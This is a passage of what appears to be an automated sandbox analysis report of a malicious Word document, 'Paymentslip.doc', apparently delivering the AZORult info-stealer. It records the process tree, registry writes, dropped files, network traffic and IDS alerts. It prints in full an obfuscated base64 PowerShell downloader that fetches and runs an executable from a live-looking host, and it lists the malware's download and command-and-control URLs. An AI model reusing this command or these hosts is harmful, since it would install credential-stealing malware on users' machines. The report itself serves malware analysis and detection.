AXwBjAG8ATgBYAEIAQQAzAHcANgBVAE0ANABwAGgAcgBiAE0ANwB1AHgAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= | C:\Windows\System32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 3104 | PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAJwBNAHkARABvAGMAdQBtAGUAbgB0AHMAJwApACsAJwBcAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUALgBlAHgAZQAnADsADQAKAHgANQBwAE4ASgBaAFEAUgBqADYAYgBRAFAAcQBTAFgASQB1AE0ANAB4AFoAagBaAE8AXwA0ACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQALgB3AG8AcgBrAHMAawBpAGwAbABzAHcAZQBiAC4AbgBlAHQALwB+AG8AZAB5AHMAcwBlAHkALwByAG8AeQB0AC8AQwBIAEkAQgBCAEIALgBlAHgAZQAnACAAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAOwANAAoAJAB2AE4AdQBHAEwAYQB3AF8AYwBvAE4AWABCAEEAMwB3ADYAVQBNADQAcABoAHIAYgBNADcAdQB4AD0AJABlAG4AdgA6AEEAcABwAGQAYQB0AGEAKwAnAFwAVwBpAG4AZABvAHcAcwBVAHAAZABhAHQAZQAuAGUAeABlACcAOwANAAoAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdAAuAHcAbwByAGsAcwBrAGkAbABsAHMAdwBlAGIALgBuAGUAdAAvAH4AbwBkAHkAcwBzAGUAeQAvAHIAbwB5AHQALwBDAEgASQBCAEIAQgAuAGUAeABlACcAIAAkAHYATgB1AEcATABhAHcAXwBjAG8ATgBYAEIAQQAzAHcANgBVAE0ANABwAGgAcgBiAE0ANwB1AHgAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3464 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Paymentslip.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
| 3616 | "C:\Users\admin\AppData\Roaming\WindowsUpdate.exe" | C:\Users\admin\AppData\Roaming\WindowsUpdate.exe | powershell.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 3728 | "C:\Users\admin\AppData\Roaming\WindowsUpdate.exe" | C:\Users\admin\AppData\Roaming\WindowsUpdate.exe | — | WindowsUpdate.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 3864 | "C:\Users\admin\Documents\WindowsUpdate.exe" | C:\Users\admin\Documents\WindowsUpdate.exe | WindowsUpdate.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 3960 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | WindowsUpdate.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 4044 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | WindowsUpdate.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (3464) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | t2! |
Value: 74322100880D0000010000000000000000000000 | |||
| (PID) Process: | (3464) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3464) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (3464) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1300627479 | |||
| (PID) Process: | (3464) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1300627600 | |||
| (PID) Process: | (3464) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1300627601 | |||
| (PID) Process: | (3464) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 880D0000BEF43E5A008DD40100000000 | |||
| (PID) Process: | (3464) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | .3! |
Value: 2E332100880D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3464) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | .3! |
Value: 2E332100880D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3464) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3464 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA674.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 3104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DJL6JM9VXS6ZHQZTH6V5.temp | — | |
MD5:— | SHA256:— | |||
| 3104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13ae93.TMP | binary | |
MD5:— | SHA256:— | |||
| 2396 | WindowsUpdate.exe | C:\Users\admin\AppData\Local\Temp\Disk.sys | executable | |
MD5:— | SHA256:— | |||
| 2396 | WindowsUpdate.exe | C:\Users\admin\AppData\Local\Chrome\StikyNot.exe | executable | |
MD5:— | SHA256:— | |||
| 3104 | powershell.exe | C:\Users\admin\AppData\Roaming\WindowsUpdate.exe | executable | |
MD5:— | SHA256:— | |||
| 3104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 3616 | WindowsUpdate.exe | C:\Users\admin\AppData\Local\Temp\Disk.sys | executable | |
MD5:— | SHA256:— | |||
| 3616 | WindowsUpdate.exe | C:\Users\admin\AppData\Local\Chrome\StikyNot.exe | executable | |
MD5:— | SHA256:— | |||
| 3464 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3104 | powershell.exe | GET | 200 | 112.140.179.97:80 | http://host.workskillsweb.net/~odyssey/royt/CHIBBB.exe | AU | executable | 432 Kb | suspicious |
3104 | powershell.exe | GET | 200 | 112.140.179.97:80 | http://host.workskillsweb.net/~odyssey/royt/CHIBBB.exe | AU | executable | 432 Kb | suspicious |
3864 | WindowsUpdate.exe | POST | 200 | 185.126.200.160:80 | http://www.admindocmarkens.us/chib/index.php | IR | text | 2 b | malicious |
3864 | WindowsUpdate.exe | POST | 200 | 185.126.200.160:80 | http://www.admindocmarkens.us/chib/index.php | IR | binary | 4.27 Mb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3104 | powershell.exe | 112.140.179.97:80 | host.workskillsweb.net | SYNERGY WHOLESALE PTY LTD | AU | suspicious |
3864 | WindowsUpdate.exe | 185.126.200.160:80 | www.admindocmarkens.us | Tebyan-e-Noor Cultural-Artistic Institute | IR | malicious |
Domain | IP | Reputation |
|---|---|---|
host.workskillsweb.net |
| suspicious |
www.admindocmarkens.us |
| malicious |
PID | Process | Class | Message |
|---|---|---|---|
3104 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3104 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3104 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3864 | WindowsUpdate.exe | A Network Trojan was detected | ET TROJAN AZORult Variant.4 Checkin M2 |
3864 | WindowsUpdate.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |
3864 | WindowsUpdate.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult HTTP Header |
3864 | WindowsUpdate.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult encrypted PE file |
3864 | WindowsUpdate.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult HTTP Header |
3864 | WindowsUpdate.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |